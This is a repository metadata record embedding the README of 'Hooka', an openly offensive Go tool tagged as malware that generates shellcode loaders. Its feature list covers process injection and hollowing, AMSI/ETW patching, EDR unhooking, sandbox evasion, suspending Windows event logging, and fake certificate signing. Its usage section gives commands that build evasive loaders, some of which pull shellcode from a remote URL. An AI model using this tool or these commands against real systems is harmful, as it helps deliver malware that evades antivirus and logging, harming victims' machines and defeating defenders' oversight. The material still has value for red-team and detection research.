{"id":17383476,"url":"https://github.com/d3ext/hooka","last_synced_at":"2025-05-15T18:03:59.511Z","repository":{"id":103773548,"uuid":"601326022","full_name":"D3Ext/Hooka","owner":"D3Ext","description":"Shellcode loader generator with multiples features","archived":false,"fork":false,"pushed_at":"2024-12-31T10:12:46.000Z","size":1213,"stargazers_count":478,"open_issues_count":7,"forks_count":71,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-05-15T18:03:56.699Z","etag":null,"topics":["golang","malware","red-team"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":"d3ext","tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"lfx_crowdfunding":null,"custom":null}},"created_at":"2023-02-13T20:43:03.000Z","updated_at":"2025-04-24T14:58:49.000Z","dependencies_parsed_at":null,"dependency_job_id":"5ad44f9e-142d-441e-b5d4-02c01515cba7","html_url":"https://github.com/D3Ext/Hooka","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FHooka/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/Hooka/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254394720,"owners_count":22063984,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","malware","red-team"],"created_at":"2024-10-16T07:42:54.673Z","updated_at":"2025-05-15T18:03:59.491Z","avatar_url":"https://github.com/D3Ext.png","language":"Go","readme":"\u003cp align=\"center\"\u003e\n \u003ch1 align=\"center\"\u003eHooka\u003c/h1\u003e\n \u003ch4 align=\"center\"\u003eShellcode loader generator with multiples features\u003c/h4\u003e\n \u003ch6 align=\"center\"\u003eCoded with 💙 by D3Ext\u003c/h6\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n\n \u003ca href=\"https://opensource.org/licenses/MIT\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/license-MIT-_red.svg\"\u003e\n \u003c/a\u003e\n\n \u003ca href=\"https://github.com/D3Ext/Hooka/blob/main/CHANGELOG.md\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/maintained%3F-yes-brightgreen.svg\"\u003e\n \u003c/a\u003e\n\n \u003ca href=\"https://github.com/D3Ext/go-recon/issues\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\"\u003e\n \u003c/a\u003e\n\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"#introduction\"\u003eIntroduction\u003c/a\u003e •\n \u003ca href=\"#features\"\u003eFeatures\u003c/a\u003e •\n \u003ca href=\"#usage\"\u003eUsage\u003c/a\u003e •\n \u003ca href=\"#library\"\u003eLibrary\u003c/a\u003e •\n \u003ca href=\"#disclaimer\"\u003eDisclaimer\u003c/a\u003e\n\u003c/p\u003e\n\n# Introduction\n\nHooka is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.\n\n# Features\n\nThis tool is able to generate loaders with this features:\n\n- Multiple shellcode injection techniques:\n - SuspendedProcess\n - ProcessHollowing\n - NtCreateThreadEx\n - EtwpCreateEtwThread\n - NtQueueApcThreadEx\n - No-RWX\n\n- Get shellcode from raw file, PE, DLL or from a URL\n- EXE and DLL are supported as output loader formats\n\n- Encrypt shellcode using:\n - AES\n - 3DES\n - RC4\n - XOR\n\n- AMSI and ETW patching (enabled by default)\n- Random variables and function names\n- Shikata Ga Nai obfuscation (see [here](https://github.com/EgeBalci/sgn))\n- Multiple ways to detect sandboxing\n- Check if username and computer name match before running\n- Enable ACG Guard protection\n- Block non-Microsoft signed DLLs from injecting into created processes\n\n- Capable of unhooking user-mode hooks via multiple techniques:\n - Classic\n - Full DLL\n - Perun's Fart technique\n\n- ***Phant0m*** technique to suspend EventLog threads (see [here](https://github.com/hlldz/Phant0m))\n- Windows API hashing (see [here](https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware))\n- Sign shellcode loader with fake or real certificates\n- Strings obfuscation via Caesar cipher (see [here](https://en.wikipedia.org/wiki/Caesar_cipher))\n- Compress code weight using Golang compile and UPX (if it's installed)\n- Compute binary entropy of the loader\n- Compute MD5, SHA1 and SHA256 checksums to keep track of the loader\n\n# Installation\n\nJust clone the repository like this:\n\n```sh\ngit clone https://github.com/D3Ext/Hooka\ncd Hooka\nmake\n```\n\nAfter that you will find the binary under the `build/` folder\n\n# Usage\n\n\u003e Help panel\n```\nUsage of Hooka:\n REQUIRED:\n -i, --input string payload to inject in raw format, as PE, as DLL or from a URL\n -o, --output string name of output file (i.e. loader.exe)\n -f, --format string format of the payload to generate (available: exe, dll) (default exe)\n\n EXECUTION:\n --proc string process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)\n --exec string technique used to load shellcode (default \"SuspendedProcess\"):\n SuspendedProcess\n ProcessHollowing\n NtCreateThreadEx\n EtwpCreateEtwThread\n NtQueueApcThreadEx\n No-RWX\n\n AUXILIARY:\n -a, --arch string architecture of the loader to generate (default amd64)\n -c, --cert string certificate to sign generated loader with (i.e. cert.pfx)\n -d, --domain string domain used to sign loader (i.e. www.microsoft.com)\n\n ENCODING:\n --enc string encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)\n --sgn use Shikata Ga Nai to encode generated loader (it must be installed on path)\n --strings obfuscate strings using Caesar cipher\n\n EVASION:\n --unhook string unhooking technique to use (available: full, peruns)\n --sandbox enable sandbox evasion\n --no-amsi don't patch AMSI\n --no-etw don't patch ETW\n --hashing use hashes to retrieve function pointers\n --user string proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0A\\admin)\n --computername string proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A)\n --acg enable ACG Guard to prevent AV/EDR from modifying existing executable code\n --blockdlls prevent non-Microsoft signed DLLs from injecting in child processes\n --phantom suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step\n --sleep delay shellcode execution using a custom sleep function\n\n EXTRA:\n --calc use a calc.exe shellcode to test loader capabilities (don't provide input file)\n --compress compress generated loader using Golang compiler and UPX if it's installed\n -r, --rand use a random set of parameters to create a random loader (just for testing purposes)\n -v, --verbose enable verbose to print extra information\n -h, --help print help panel\n\nExamples:\n hooka -i shellcode.bin -o loader.exe\n hooka -i http://192.168.1.126/shellcode.bin -o loader.exe\n hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg\n hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose\n```\n\n\u003e Generate a simple EXE loader\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe\n```\n\n\u003e Generate a DLL loader\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll\n```\n\n\u003e Use custom config (various examples)\n```sh\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose\n$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls\n$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose\n$ hooka_linux_amd64 --calc -o loader.exe --user \"DESKTOP-E1D6G0A\\tom\" --computername \"DESKTOP-E1D6G0A\" --compress --strings\n```\n\n# Demo\n\n\u003cimg src=\"https://raw.githubusercontent.com/D3Ext/Hooka/main/assets/demo1.png\"\u003e\n\n\u003cimg src=\"https://raw.githubusercontent.com/D3Ext/Hooka/main/assets/demo2.png\"\u003e\n\n# TODO\n\n- ~~Check username and hostname before running~~\n- Add direct and indirect syscall\n- Add Chacha20 cypher to encrypt shellcode\n\n# Library\n\nThe official Golang package has most of the already mentioned features and some others. To make use of it, see [here](https://github.com/D3Ext/Hooka/tree/main/examples) and [here](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka)\n\n# References\n\nYou can take a look at some of the mentioned techniques here:\n\n```\nhttps://github.com/C-Sto/BananaPhone\nhttps://github.com/timwhitez/Doge-Gabh\nhttps://github.com/Ne0nd0g/go-shellcode\nhttps://github.com/optiv/Freeze\nhttps://github.com/f1zm0/acheron\nhttps://github.com/Enelg52/OffensiveGo\nhttps://github.com/trickster0/TartarusGate\nhttps://github.com/Kara-4search/HookDetection_CSharp\nhttps://github.com/RedLectroid/APIunhooker\nhttps://github.com/plackyhacker/Peruns-Fart\nhttps://github.com/rasta-mouse/TikiTorch\nhttps://github.com/phra/PEzor\nhttps://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet\nhttps://github.com/chvancooten/maldev-for-dummies\nhttps://blog.sektor7.net/#!res/2021/perunsfart.md\nhttps://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions#checking-for-hooks\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++\nhttps://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time\nhttps://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware\nhttps://winternl.com/detecting-manual-syscalls-from-user-mode/\n```\n\n# Disclaimer\n\nUse this project under your own responsability! The author is not responsible of any bad usage of the project.\n\n# License\n\nThis project is under [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":["https://ko-fi.com/d3ext"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fhooka","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fhooka","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fhooka/lists"}